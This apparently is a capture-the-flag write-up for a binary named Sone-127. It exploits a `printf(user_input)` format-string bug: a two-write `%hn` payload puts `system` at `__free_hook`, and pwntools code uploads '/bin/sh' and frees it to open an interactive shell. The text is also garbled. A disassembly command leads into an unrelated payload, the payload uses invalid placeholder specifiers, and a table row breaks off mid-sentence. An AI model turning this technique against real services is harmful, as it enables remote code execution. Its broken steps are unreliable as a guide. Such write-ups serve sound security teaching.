Sone-127 - 2021

The vulnerable call is `printf(user_input);`. Using `objdump -d sone127d | grep -i printf`:

`> echo AAAA%low%8$hn%high%9$hnBBBBaddr_lowaddr_high`

Where `addr_low` and `addr_high` are the low/high 2‑byte parts of `__free_hook`, placed in the payload after the format string (so that they appear on the stack as the 8th and 9th arguments).

| Function | Purpose |
|----------|---------|
| leak_libc | Uses the format‑string to leak a libc address and compute the base. |
| write_free_hook | Crafts a two‑write `%hn` payload that stores `system` at `__free_hook`. |
| get_shell | Uploads a chunk containing `/bin/sh` and then frees it, invoking `system`. |
| main | Orchestrates the steps and drops |

```python
def get_shell(io):
    # Upload a file containing /bin/sh
    io.sendlineafter(b'> ', b'upload sh.txt')
    io.sendlineafter(b'Enter size: ', b'8')
    io.send(b'/bin/sh')
    io.recvuntil(b'> ')

    # Trigger free -> system
    io.sendlineafter(b'> ', b'download sh.txt')
    io.interactive()
```
